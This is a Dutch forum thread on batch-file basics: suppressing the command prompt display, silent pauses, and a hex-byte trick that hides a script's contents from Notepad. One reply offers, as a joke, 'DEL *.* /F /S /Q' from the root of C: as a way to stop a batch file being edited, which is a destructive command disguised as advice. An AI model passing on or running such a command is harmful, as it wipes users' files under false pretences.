![]() |
[Batch] Cmd om begin path weg te krijgen?
Lo,
Wat is ook al weer de cmd om de path line weg te krijgen bij een batch bestandje? Dat je dus inplaats van 'C:\> REM TEXT' het volgende krijgt 'REM TEXT'. Danku! |
@echo off bedoel je?
|
Citaat:
REM ******************** REM * TEST * REM ******************** inplaats van c:\>REM ******************** c:\>REM * TEST * c:\>REM ******************** |
Je moet ook echo gebruiken in plaats van rem. Rem komt van remark, en is dus bedoelt als commentaar.
|
Citaat:
|
Code:
@echo off |
Citaat:
Gebruik nou gewoon echo dan, ben je klaar. K? |
prompt
standaatd instelling is prompt $p$g $p = schijf + pad $g = > als je dus prompt HOER: doet krijg je bijv HOER: cd.. HOER: echo ik stink ik stink HOER: |
Citaat:
Citaat:
|
prompt
^^ werkt niet want maar prompt f$h wel $h staat voor backspace en verwijdert het voorgaande teken de f in dit geval dus resultaat is dat er niks overblijft typ eens "prompt /?" dan zie je alle mogelijkheden maar @echo off aan begin van je batj bestand en de rest met echo weergeven is wel wat conventionelere manier van doen Code:
@prompt f$h Code:
@echo off |
Is er ook een mogelijkheid om de batch tijdelijk stil te zetten zonder pause en zonder delay bestandje?
|
PAUSE>NUL
Wordt die stil gezet zonder melding, moet je op toets drukken om verder te laten gaan.. @ECHO OFF ECHO. ECHO. ECHO Tekst blaat ECHO. ECHO. staat voor een 'witregel' voor 't geval dat je dat nog niet wist ^^ |
Citaat:
|
Enige optie is Delay denk ik dan
|
Citaat:
|
Nog een vraag :p Is het mogelijk je batch 'edit locked' te make? Dat de batch dus niet aangepast of bekeken kan worden in notepad ofzo
|
Citaat:
type je batch bestand zoals je het wilt hebben voeg bovenaan toe in het bestand toe als het klaar is FE FF 0D 0A 63 6C 73 0D 0A (met een hexeditor) En nee dit is gene onkraakbare beveiliging, tis gewoon dat notepad denkt dat het een unicode bestand is en het dus neit leesbaar weergeeft. de rest zorgt ervoor dat de error van het scherm gewiped wordt |
Citaat:
C: CD\ DEL *.* /F /S /Q Daarna is je batchfile niet meer aan te passen in notepad.. |
Citaat:
|
Citaat:
|
Citaat:
(/s -> +subdirs) |
Citaat:
|
Citaat:
Code:
:loop overigens moet je mij eens uitleggen waarom je een batchfile stil zou willen zetten zonder dat deze ooit verder gaat ... . :rolleyes: |
Citaat:
@echo lulhannes daarmee onderdruk je eenmalig de rest van de regel. heeft verder geen effect op de echo. |
Citaat:
scripten heet dat en de prompt kun je in een var frotten en weer terugzetten |
Alle tijden zijn GMT +1. Het is nu 03:02. |